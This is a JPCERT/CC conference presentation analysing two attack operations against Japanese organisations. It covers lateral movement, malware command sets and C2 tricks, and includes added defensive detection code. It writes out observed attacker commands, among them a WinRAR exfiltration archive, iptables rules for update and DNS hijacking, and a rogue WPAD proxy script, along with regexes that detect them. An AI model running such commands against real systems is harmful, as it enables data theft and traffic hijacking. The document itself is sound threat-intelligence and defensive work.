Revealing the Attack Operations Targeting Japan
JPCERT/CC
Shusei Tomonaga, Yuu Nakamura
CODE BLUE 2015

Copyright 2015 JPCERT/CC All rights reserved.
Agenda
  Introduction
  Operation A
  Operation B
Self-introduction
Shusei Tomonaga and Yuu Nakamura, Analysis Center at JPCERT Coordination Center: malware analysis and forensic investigation.
JPCERT Coordination Center (Japan Computer Emergency Response Team Coordination Center)
- Early warning information
- CSIRT establishment support
- Industrial control system security
- International collaboration
- Artifact (e.g. malware) analysis
Targeted Attacks Handled by JPCERT/CC
From April to September 2015: 934, across 130 organizations
- Operation A: 93 organizations
- Operation B: 4 organizations
Two types of attack operations are introduced below.

Operation A
Characteristics of Operation A
- Attackers' infrastructure (overseas) -> compromised Web sites (Japan) -> victim organizations (public offices, private companies)
- Delivery: targeted emails, widespread emails, watering hole
- Exploited vulnerabilities: Flash Player (CVE-2015-5119, CVE-2015-5122); MS14-068 (Kerberos, 3011780; CVE-2014-6324)
Details of Internal Intrusion Techniques
Attack Patterns: Timeline of Attack Vectors
- Attack vectors: disguised icon; document file (exploiting vulnerabilities: CVE-2014-7247, CVE-2015-5119, CVE-2015-5122); drive-by download
- Dates observed: 2014/05, 2014/09, 2014/11, 2015/01, 2015/05, 2015/07, 2015/09
- Lure themes: medical expense, health insurance
In many attacks, malware is disguised with fake icons, compressed with zip or lzh, and attached to emails. Attacks aimed at specific targets may involve an exchange of emails with the target.
Investigation of the Compromised Environment
- Uses legitimate tools provided by Microsoft
- Example: dsquery, used in some cases targeting specific individuals
Collecting Email Account Information
- Uses free tools (similar to NirSoft Mail PassView)
- Attempts to receive the victim's emails from outside
- May lead to new attack emails (replies within existing email correspondence), spreading the infection from organization to organization
Collecting Classified / Personal Information
Search Network Drive (1): net use and wmic commands

> net use
New connections will be remembered.

Status  Local  Remote             Network
-------------------------------------------------------------------------------
OK      T:     \\FILESV01\SECRET  Microsoft Windows Network
OK      U:     \\FILESV02\SECRET  Microsoft Windows Network

> wmic logicaldisk get caption,providername,drivetype,volumename
Caption  DriveType  ProviderName       VolumeName
C:       3                             OS
D:       3                             Volume
T:       4          \\FILESV01\SECRET  Volume
U:       4          \\FILESV01\SECRET  Volume

DriveType = 4 is a network drive.
Search Network Drive (2): combination of the netstat and nbtstat commands

> netstat -an
TCP  192.168.xx.xx:49217  192.168.yy.yy:445  ESTABLISHED

> nbtstat -a 192.168.yy.yy
Name      Type    Status
---------------------------------------------
FILESV01  UNIQUE  Registered

Port 445 is used as the key to find the hosts offering the file sharing service.
Search Targeted Data: dir command
Searches not only the network drives but also the compromised computers themselves.
/s : listed recursively
/o-d : sorted by date, newest first

> dir c:\users\hoge\*.doc* /s /o-d
c:\users\hoge\AppData\Local\Temp Directory
2014/07/29 10:19    28,672 20140820.doc
1 File 28,672 bytes
c:\users\hoge\Important Information Directory
2015/08/29 10:03     1,214 Design Document.doc

> dir \\FILESV01\SECRET
\\FILESV\SECRET Directory
2014/07/11 09:16 [DIR] Management of Partner Companies
2014/09/04 11:49 [DIR] Management of Intellectual Property
2014/08/01 09:27 [DIR] Location information
Compress, Download, Delete Evidence
Documents are compressed per folder with RAR; the RAR files are sent to the C&C servers and then deleted.

> winrar.exe a -r -ed -v300m -ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\Management of Intellectual Property -n*.ppt* -n*.doc* -n*.xls* -n*.jtd
Adding \\FILESV01\SECRET\Management of Intellectual Property\Committee List(2015.05.01).docx OK
Adding \\FILESV01\SECRET\Management of Intellectual Property\Framework.ppt OK
Adding \\FILESV01\SECRET\Management of Intellectual Property\Application List.xlsx OK
Adding \\FILESV01\SECRET\Management of Intellectual Property\Design Document.jtd OK
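As an added defender-side example (not JPCERT/CC's code), the Python below scores process-creation command lines against the discovery and archiving commands shown on the slides above (net use, wmic logicaldisk, netstat/nbtstat, dir /s /o-d, dsquery, WinRAR with a -ta date filter) and flags a host only when the sequence accumulates; the pattern weights, the threshold and the log lines are constructed for this illustration.

```python
import re

# Patterns derived from the command sequence on the slides. Each entry is
# (name, regex, weight); the weights are this example's own choice: a lone
# "net use" is routine, a WinRAR run filtered by date and document type is not.
RECON_PATTERNS = [
    ("net_use_enum", re.compile(r"\bnet\s+use\b", re.I), 1),
    ("wmic_drives", re.compile(r"\bwmic\s+logicaldisk\b", re.I), 1),
    ("netstat_an", re.compile(r"\bnetstat\s+-a?n\b", re.I), 1),
    ("nbtstat_lookup", re.compile(r"\bnbtstat\s+-a\b", re.I), 1),
    ("dsquery", re.compile(r"\bdsquery\b", re.I), 1),
    ("dir_recursive_by_date", re.compile(r"\bdir\b.*\s/s\b.*\s/o-d\b", re.I), 2),
    ("rar_date_filter", re.compile(r"\b(win)?rar(\.exe)?\s+a\b.*\s-ta\d{8}\b", re.I), 3),
    ("rar_doc_filter", re.compile(r"\b(win)?rar(\.exe)?\s+a\b.*-n\*\.(doc|xls|ppt|jtd)", re.I), 2),
]


def score_command(cmdline):
    """Return (matched pattern names, summed weight) for one command line."""
    hits = [(name, w) for name, rx, w in RECON_PATTERNS if rx.search(cmdline)]
    return [n for n, _ in hits], sum(w for _, w in hits)


def triage(events, threshold=5):
    """events: iterable of (timestamp, host, user, commandline) tuples, as you would
    extract from Sysmon event ID 1 or Windows 4688 with command-line auditing.
    A host is flagged only when the summed weight reaches the threshold."""
    per_host = {}
    for _ts, host, _user, cmd in events:
        names, score = score_command(cmd)
        if names:
            entry = per_host.setdefault(host, {"score": 0, "hits": []})
            entry["score"] += score
            entry["hits"].extend(names)
    return {h: e for h, e in per_host.items() if e["score"] >= threshold}


# Constructed sample events mirroring the slide sequence on PC-A, plus one
# routine drive mapping on PC-B that must not be flagged on its own.
SAMPLE_EVENTS = [
    ("2015-08-29T10:01:02", "PC-A", "hoge", "net use"),
    ("2015-08-29T10:01:09", "PC-A", "hoge",
     "wmic logicaldisk get caption,providername,drivetype,volumename"),
    ("2015-08-29T10:01:30", "PC-A", "hoge", "netstat -an"),
    ("2015-08-29T10:01:41", "PC-A", "hoge", "nbtstat -a 192.168.0.20"),
    ("2015-08-29T10:02:05", "PC-A", "hoge", r"dir c:\users\hoge\*.doc* /s /o-d"),
    ("2015-08-29T10:05:12", "PC-A", "hoge",
     r"winrar.exe a -r -ed -v300m -ta20140101 %TEMP%\a.rar "
     r"\\FILESV01\SECRET\Management of Intellectual Property -n*.ppt* -n*.doc* -n*.xls* -n*.jtd"),
    ("2015-08-29T11:15:00", "PC-B", "admin", r"net use T: \\FILESV01\SECRET"),
]

if __name__ == "__main__":
    for host, entry in triage(SAMPLE_EVENTS).items():
        print(host, entry["score"], ", ".join(entry["hits"]))
```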
Methods Used to Spread Infection
Exploiting Vulnerabilities (MS14-068 + MS14-058)
Actors: PC-A (initially infected), Domain Controller, PC-B
1. Escalate privilege on PC-A (MS14-058) and dump users' passwords with mimikatz
2. Exploit the MS14-068 vulnerability and gain Domain Admin privileges
3. Upload mimikatz to the DC and dump the admins' passwords
4. Copy malware to PC-B
5. Register a task in order to execute the malware
6. The malware executes according to the task
Investigating SYSVOL Scripts
Actors: PC-A, Domain Controller, PC-B, attackers' C2 server
1. Download the logon scripts from the DC, compress and archive them
2. Download the archive to the C2 server
3. Search the scripts for admin passwords
4. Copy malware to PC-B
5. Register a task in order to execute the malware
6. The malware executes according to the task
Password List-based Attack
Actors: PC-A, Domain Controller, PC-B
1. Get the list of Domain Admins users from the DC
2. Attempt logons with logon.exe
3. Copy malware to PC-B
4. Register a task
5. Execute
Exploiting the Built-in Administrator Password
Actors: PC-A, PC-B
1. Escalate privilege on PC-A (UAC bypass) and dump users' passwords
2. Pass the hash, or: net use \\PC-B\IPC$ [password] /u:Administrator
3. Copy malware to PC-B
4. Register a task
5. Execute
Setting Malware in File Servers
Actors: PC-A, PC-B, file server
1. Replace an existing file on the file server with malware disguised with a fake icon
2. The malware on the file server is executed by the users who open the file
Exploiting WPAD
WPAD (Web Proxy Auto-Discovery)
- Turned on by default
- Gets the automatic configuration script from either the URL specified by the DHCP server or http://wpad/wpad.dat
Exploiting WPAD (Step 1: NetBIOS Spoofing)
PC-A (infected) runs wpad.exe; PC-B is the victim.
1. PC-B broadcasts a name query for NB WPAD
2. PC-A answers the name query ("I am WPAD")

Exploiting WPAD (Step 2: Fake WPAD Server)
3. PC-B requests http://wpad/wpad.dat
4. wpad.exe on PC-A responds with the automatic configuration script (wpad.dat):

function FindProxyForURL(url, host) {
    if (myIpAddress() != "[PC-A addr]") {
        return "PROXY wpad:8888; DIRECT";
    }
    return "DIRECT";
}

Exploiting WPAD (Step 3: Man-in-the-Middle Proxy)
5. PC-B's Web traffic now passes through the proxy on PC-A (wpad.exe), which embeds an iframe pointing to the attackers' Web site into the pages it relays
6. Drive-by download attack from the attackers' Web site (attackers' infrastructure)
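Step 1 is the observable a defender can watch for: a host on the segment answering NetBIOS name queries for WPAD. The Python below (added here, not the presentation's code) decodes NBNS responses per RFC 1001/1002 and reports any WPAD answer whose address is outside an allowlist; the packets are constructed with the included helper, not captured, and the addresses are made up.

```python
import struct

NB_TYPE = 0x0020   # NetBIOS general name service record (RFC 1002)

def encode_nb_name(name, suffix=0x00):
    """First-level encoding (RFC 1001 14.1): name space-padded to 15 bytes plus a
    suffix byte; each byte becomes 'A'+high nibble, 'A'+low nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return bytes([len(enc)]) + enc + b"\x00"

def decode_nb_name(pkt, off):
    """Inverse of encode_nb_name; returns (name, suffix, offset past the name)."""
    length = pkt[off]
    enc = pkt[off + 1:off + 1 + length]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, length, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15], off + length + 2

def parse_nbns_answers(pkt):
    """Return [(name, suffix, ipv4)] from the answer section of an NBNS response."""
    _tid, flags, qd, an, _ns, _ar = struct.unpack(">6H", pkt[:12])
    if not flags & 0x8000:           # bit 15 clear: a query, not a response
        return []
    off = 12
    for _ in range(qd):              # skip any echoed question entries
        off = decode_nb_name(pkt, off)[2] + 4
    answers = []
    for _ in range(an):
        name, suffix, off = decode_nb_name(pkt, off)
        rtype, _cls, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        rdata, off = pkt[off + 10:off + 10 + rdlen], off + 10 + rdlen
        if rtype == NB_TYPE:         # RDATA: repeated (2-byte NB flags, 4-byte IPv4)
            for i in range(0, rdlen - 5, 6):
                answers.append((name, suffix, ".".join(str(b) for b in rdata[i + 2:i + 6])))
    return answers

def sample_nbns_response(tid, name, ip):
    """Constructed positive name query response (test input, not a capture)."""
    rdata = struct.pack(">H4B", 0x0000, *(int(x) for x in ip.split(".")))
    return (struct.pack(">6H", tid, 0x8500, 0, 1, 0, 0) + encode_nb_name(name)
            + struct.pack(">HHIH", NB_TYPE, 1, 300000, len(rdata)) + rdata)

def wpad_spoof_alerts(packets, trusted_wpad_ips):
    """packets: [(sender_ip, raw_nbns_bytes)] seen on the segment. Any answer to the
    WPAD name with an address outside the allowlist is reported (an empty allowlist
    is the right setting where no WPAD host is meant to exist)."""
    alerts = []
    for sender, pkt in packets:
        for name, _suffix, ip in parse_nbns_answers(pkt):
            if name == "WPAD" and ip not in trusted_wpad_ips:
                alerts.append("%s answered NBNS query for WPAD with %s" % (sender, ip))
    return alerts
```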
Summary: Methods of Spreading Infection

Method                                     | AD          | Privilege escalation                      | Note
MS14-068                                   | Necessary   | Unnecessary / necessary for password dump | Risk exists when the DC is unpatched
SYSVOL search                              | Necessary   | Unnecessary                               |
Brute force attack (password list attack)  | Necessary   | Unnecessary                               | Risk exists when the password is weak
Abusing built-in Administrator             | Unnecessary | Necessary                                 | Presumes that the password is the same
Exploiting file servers                    | Unnecessary | Unnecessary                               | Risk exists when the file is disguised as one that many users open
Exploiting WPAD                            | Unnecessary | Unnecessary                               | Situations are limited
Details of Tools and Malware

Characteristics of Malware

Malware           | Overview                                | File format | Form of attack
Emdivi (t17)      | HTTP BOT                                | EXE         | Intrude
Tools             | Password dump, etc.                     | EXE, etc.   | Intrude
usp10jpg          | Download (low-frequency communication)  | DLL, data   | Lateral movement
Emdivi (t19, t20) | HTTP BOT (more sophisticated than t17)  | EXE         | Lateral movement
BeginX            | Remote shell tool                       | EXE         | Lateral movement
GStatus           | HTTP BOT (low-frequency communication)  | EXE, DLL    | Conceal?

Different types of malware reside depending on the phase and the scale of damage of the attack.
Reference: [Ayaka Funakoshi. A study on malware characteristics and its effects observed in targeted attacks. MWS, 2015]
Tools

Type                         | Overview                                       | Filename
Password dump / Pass-the-hash | Quarks PwDump                                 | qp.exe, qd.exe, QDump.exe, etc.
                             | MimikatzLite                                   | gp.exe
                             | Windows Credentials Editor                     | wce.exe, ww.exe
                             | Mimikatz                                       | mz.exe, mimikatz.exe, mimikatz.rar (sekurlsa.dll)
Vulnerability exploitation   | MS14-068 (CVE-2014-6324)                       | ms14-068.exe, ms14-068.tar.gz
                             | MS14-058 (privilege escalation, CVE-2014-4113) | 4113.exe
UAC bypass                   | UAC bypass tool                                | msdart.exe, puac.exe, etc.
Packet transmit              | Htran, proxy-adaptive Htran                    | htproxy.exe, etc.
Mail account theft           | Similar to NirSoft Mail PassView               | CallMail.exe, outl.exe, etc.
Utility                      | Attempt logon based on a list                  | logon.exe
                             | WinRAR archiver                                | yrar.exe, rar.exe, etc.
                             | Highly sophisticated dir command               | dirasd.exe, etc.
                             | Change timestamp                               | timestomp.exe
Emdivi (t17): HTTP BOT with basic functions
Repeatedly upgraded over the past year, implementing new commands.

Command   | Date of implementation
DOABORT   |
DOWNBG    |
GETFILE   |
LOADDLL   |
SETCMD    |
SUSPEND   |
UPLOAD    |
VERSION   |
GOTO      | May 2015
CLEARLOGS | August 2015
Emdivi (t20): highly sophisticated Emdivi
- The number of implemented commands has increased and decreased over the past year: 18 to 41 (based on JPCERT/CC's study)
- In some cases, the targeted organization's proxy server address is hard-coded
- May only run on specific computers (data is encrypted with the computer's SID)
usp10jpg: Download (low-frequency communication)
- Communication is performed once a day; the day of the week for communication can be specified
- Tends to be set on computers that are not infected with Emdivi (secondary infection)
- DLL preloading attack: an application loads the malicious DLL (dwmapi.dll, etc.) through the DLL search order; the DLL reads data from a ***.DAT file and executes it
Difficulty of Detecting usp10jpg
- A computer infected with Emdivi is easy to detect due to its high-frequency communication with the attackers' infrastructure
- usp10jpg may be left undetected due to its low-frequency communication
BeginX: Remote Shell Tool
- BeginX Server: listens on specific ports and waits for commands; both UDP and TCP versions are available
- BeginX Client: sends commands to the BeginX Server; controlled via Emdivi
Image of Using BeginX
- A segment that cannot connect to the Internet cannot be controlled through an Emdivi infection
- The computer infected with Emdivi (reachable from the attackers' infrastructure) runs the BeginX client; a host in the isolated segment runs the BeginX server, so it can be controlled via BeginX
GStatus: HTTP BOT different from Emdivi
Not found in many organizations, but...
Bot functions: get drive information, execute arbitrary shell command, process list, screen-related functions
GStatus Web panel (admin screen): screenshot
Analysis Tools

emdivi_string_decryptor.py
emdivi_string_decryptor.py
Emdivi encoded strings (screenshot)

Differences depending on the version string:

        | Ver 17                                    | Ver 19 or 20                        | Ver 20
Encrypt | XxTEA encrypt                             | XxTEA decrypt                       | AES decrypt
Decrypt | XxTEA decrypt                             | XxTEA encrypt                       | AES encrypt
Key     | MD5( MD5(base64(ver)) + MD5(key_string) ) | Scanf( "%x", Inc_Add( ver17_key ) ) | Inc_Add( ver17_key )
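The XXTEA path of the table above, as an added example written for this page (it is not JPCERT/CC's emdivi_string_decryptor.py): standard XXTEA, the t17 key derivation as the slide states it, and the t19/t20 role swap in which strings are decoded by running XXTEA encrypt. The byte-to-word layout, the way the inner MD5 digests are joined, and all key and string values are assumptions; the Inc_Add key step of t19/t20 and the AES variant of t20 are not reproduced.

```python
import base64
import hashlib
import struct

DELTA, MASK = 0x9E3779B9, 0xFFFFFFFF

def _mx(s, y, z, p, e, k):
    return ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4)))
            ^ ((s ^ y) + (k[(p & 3) ^ e] ^ z))) & MASK

def xxtea_encrypt(v, k):
    """Corrected Block TEA (XXTEA) on a list of n>=2 32-bit words, 4-word key, in place."""
    n, s, z = len(v), 0, v[-1]
    for _ in range(6 + 52 // n):
        s = (s + DELTA) & MASK
        e = (s >> 2) & 3
        for p in range(n):
            y = v[(p + 1) % n]
            v[p] = (v[p] + _mx(s, y, z, p, e, k)) & MASK
            z = v[p]
    return v

def xxtea_decrypt(v, k):
    n, rounds = len(v), 6 + 52 // len(v)
    s, y = (rounds * DELTA) & MASK, v[0]
    for _ in range(rounds):
        e = (s >> 2) & 3
        for p in range(n - 1, -1, -1):
            z = v[p - 1]                 # v[-1] is v[n-1], as in the reference code
            v[p] = (v[p] - _mx(s, y, z, p, e, k)) & MASK
            y = v[p]
        s = (s - DELTA) & MASK
    return v

def emdivi_t17_key(ver, key_string):
    """Key = MD5( MD5(base64(ver)) + MD5(key_string) ) as the slide gives it; joining the
    inner digests as hex strings and little-endian key words are ASSUMED."""
    inner = (hashlib.md5(base64.b64encode(ver.encode())).hexdigest()
             + hashlib.md5(key_string.encode()).hexdigest())
    return list(struct.unpack("<4I", hashlib.md5(inner.encode()).digest()))

def to_words(data):
    data += b"\x00" * (-len(data) % 4)   # zero-pad to whole words (ASSUMED layout)
    return list(struct.unpack("<%dI" % (len(data) // 4), data))

def from_words(words):
    return struct.pack("<%dI" % len(words), *words)

def decode_string(ver, blob, key):
    """Per the slide: t17 decodes with XXTEA decrypt, t19/t20 swap the roles and decode
    with XXTEA encrypt (the AES variant of t20 is not reproduced here)."""
    if ver == "17":
        words = xxtea_decrypt(to_words(blob), key)
    elif ver in ("19", "20"):
        words = xxtea_encrypt(to_words(blob), key)
    else:
        raise ValueError("unsupported version string: %r" % ver)
    return from_words(words).rstrip(b"\x00")
```

To exercise it on constructed data, derive a key with emdivi_t17_key("17", "constructed-key-string"), encode a string with xxtea_encrypt the way a t17 sample would, and confirm decode_string("17", ...) returns it.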
emdivi_string_decryptor.py (screenshots of the tool's output)

Demo
Operation B
Attack Techniques
Drive-by Download (Watering Hole) Attack
0. Deface a Japanese Web site (Web server in Japan)
1. The targeted organization accesses the Web site
2. Redirect to the attackers' server
3. Download malware
4. Malware infection
Access Control
.htaccess on the attackers' server restricts access by target name and IP address.

0-day Exploits
Update Hijacking: method used to alter the update information
Actors: targeted organization, update server, fake update server
0. Alter the update information on the update server
1. The targeted organization requests an update from the update server
2. Fake update information is returned
3. Request to download from the fake update server
4. Download malware
5. Malware infection
Another Update Hijacking Pattern: method used without changing the update server's file
Actors: targeted organization, update server, fake update server
0. Change iptables on the update server
1. Software update

iptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:53

TCP 80 from the targeted organization's source address is forwarded by iptables to the fake update server.
Domain Name Hijacking
Actors: targeted organization, registrar, .com registry, DNS server; attackers' infrastructure (DNS server, Web server); legitimate server
0. Change the registration information at the registrar
1. DNS query from the targeted organization
2. DNS query to the attackers' DNS server
4. Web access to the attackers' Web server instead of the legitimate server
Domain Name Hijacking: routing only specific DNS queries by using iptables

iptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 30 --to 34 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:53

Queries whose first label is AAA (AAA.example.com) are redirected to aa.bb.cc.dd:54; all other DNS queries are redirected to ww.xx.yy.zz:53.

Details of Malware
Characteristics of Malware
- Uses different malware before and after the intrusion (intrusion phase vs. concealing phase)
- Some malware runs in memory only
- Embeds the target organization's internal information
- Uses code signing certificates in some cases
Malware (Intrusion): HTTP bot with basic functions

Command  | Info
0x184004 | Execute remote shell
0x184008 | Run remote shell command
0x18400c | Create file
0x184010 | Load file
0x184014 | Get drive information
0x184018 | Create directory
0x18401c | Search file
0x184020 | Delete file
0x184024 | Move file
0x184028 | Process list
0x18402c | Terminate process
0x184030 | Sleep
0x184034 | Install command
0x184038 | Set sleep time
0x18403c | Terminate
IP Address Acquisition Algorithm
The C2 IP address is fetched from a Web page and decoded from the text between marker strings:
- start: @MICR0S0FT, end: C0RP0RATI0N
- start: lOve yOu 4 eveR, end: Reve 4 uOy evOl
Malware (Intrusion): plug-in-based malware

Command number | Info
0              | Send data to server
1              | Set TickCount
3              | Plug-in registration
4              | Allocate plug-in settings area
5              | Set plug-in settings area
6              | Create/Execute plug-in
7              | Terminate plug-in
8              | Create configuration file
9              | -
Malware Running in Memory Only: CVE-2013-3918 with McRAT
- Exploit flow: ROP -> shellcode -> malware
- Executes rundll32.exe and injects code into it
- McRAT's data following the shellcode is what gets injected
- Not saved as a file
Malware (Intrusion): simple HTTP bot with limited functions

Command  | Info
downonly | Download file
downexec | Download and execute file
-        | Run remote shell command
Preshin Controller
- PHP-based controller
- Example of command execution (screenshot)
Malware (Intrusion): HTTP bot with basic functions

Command | Info
1       | Get disk information
2       | File list
3       | Open file
4       | Upload file
5       | Create file
7       | Load file
8       | -
9       | Delete file
10      | Delete file/folder
11      | Upload file
12      | Create folder
13      | Move file
Malware (Concealing): malware with rootkit functions (Hikit)

Command     | Info
file        | File-related operation
information | Send configuration information
proxy       | Enable proxy settings
connect     | Connect to Hikit proxy
shell       | Run remote shell command
socks5      | Enable proxy settings (SOCKS5)
exit        | Terminate
Hikit Configuration Information
Hikit carries proxy information for the internal network: proxy info, ID, target name, rootkit setting.
Malware (Concealing): malware recently often used (Derusbi)

Command | Info
cmd4    | Service/Process-related operation
cmd5    | Run remote shell command
cmd6    | Connect to Derusbi proxy
cmd7    | File operation
cmd8    | Terminate
cmd9    | Create/Delete file
Derusbi Configuration Information
Derusbi carries proxy information for the internal network: proxy info, ID.
Code Signing Certificates

Identity             | Type | Country
System integrator    | exe  | Japan
Software vendor      | exe  | Japan
Software vendor      | exe  | Korea
Automaker            | exe  | Korea
Heavy industry       | jar  | Korea
Software vendor      | exe  | Korea
Electronics industry | jar  | Korea
Software vendor      | exe  | Korea
Infrastructure Used by Attackers
Targeted organization (Japan) -> attackers' server in Japan (Web server with a backdoor; iptables forwarding) -> overseas server (C2 server)
Linux Backdoor
- mod_rootme source
- Keyword: Roronoa

Functions:
MyNetstat, CreateShell, Mymkdir, PortTunnelGet, GetFileSource, Mymkfile, PortTunnel_RemoteClose, MyPs, Myrmfile, PortTunnel_Show, KillByPid, Myrmdir, CreatePortTunnel, NewConnectTo, ListDir, PortForwardStart, PutFile, my_reboot, PortForward_Show, PutFileDest, ShowHide, PortForward_Close, ShellServer, SwitchHide
Analysis Tools

apt17scan.py
- Scan with YARA
- Search the configuration data address
- Parse the configuration data
- Dump the configuration

Commands:
- apt17scan: detecting malware
- derusbiconfig: dump configuration information for Derusbi
- hikitconfig: dump configuration information for Hikit
- agtidconfig: dump configuration information for Agtid

Demo

How to Download
https://github.com/JPCERTCC
Thank you
[email protected]
www.jpcert.or.jp

Incident report
[email protected]
www.jpcert.or.jp/form/